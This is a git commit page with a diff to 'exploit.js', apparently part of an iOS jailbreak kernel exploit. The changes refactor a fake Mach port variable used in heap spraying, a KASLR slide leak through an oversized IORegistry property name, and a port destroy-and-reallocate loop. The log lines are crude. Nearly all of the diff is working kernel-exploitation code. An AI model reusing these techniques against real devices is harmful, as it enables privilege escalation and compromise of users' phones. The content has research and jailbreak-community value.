authorspv420 <spv@spv.sh>2022-08-05 02:03:08 -0400
committerspv420 <spv@spv.sh>2022-08-05 02:03:08 -0400
commit4099ee5b61a87c43dbbef6ce3e62aed7a93b22c0 (patch)
tree3fb5f5c846945c1cf23e578916f73e49b35325cd /src
parent6ef41cfca1769a1641da00526b4f87a6be2125df (diff)
cock
Diffstat (limited to 'src')
-rwxr-xr-xsrc/stage4/kexp/exploit.js9
1 files changed, 4 insertions, 5 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8945710..85a4eb9 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -44,7 +44,7 @@ function find_ipcspacekernel() {
var task_self = 0;
var kslide = 0;
-var fakeportData = 0;
+var fakeportData = new mach_port_t();
var kOSSerializeDictionary = 0x01000000;
var kOSSerializeArray = 0x02000000;
@@ -113,7 +113,6 @@ function copyinPort(kport, cnt) {
var o = MACH_PORT_NULL;
var data = shit_heap(4);
var master = new io_master_t();
- fakeportData = shit_heap(4);
var host_self = mach_host_self();
host_get_io_master(mach_host_self(), master.addy);
ret = spray_data(NULL, 0, 5, data);
@@ -153,7 +152,7 @@ function copyinPort(kport, cnt) {
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
p0laris_log("%d %s\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
- spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ spray_data(tst, strlen(tst) + 1, 10, fakeportData.addy);
kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
p0laris_log("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
found = true;
@@ -488,8 +487,8 @@ again: while (true) {
p0laris_log("fuck\n");
usleep(10000);
sched_yield();
- mach_port_destroy(mach_task_self(), read_u32(fakeportData));
- ret__ = spray_data(tst, tst_str.length + 1, 10, fakeportData);
+ mach_port_destroy(mach_task_self(), fakeportData.deref());
+ ret__ = spray_data(tst, tst_str.length + 1, 10, fakeportData.addy);
p0laris_log("sd %d (%s)\n", ret__, mach_error_string(ret__));
p0laris_log("fuck\n");
p0laris_log("done realloc");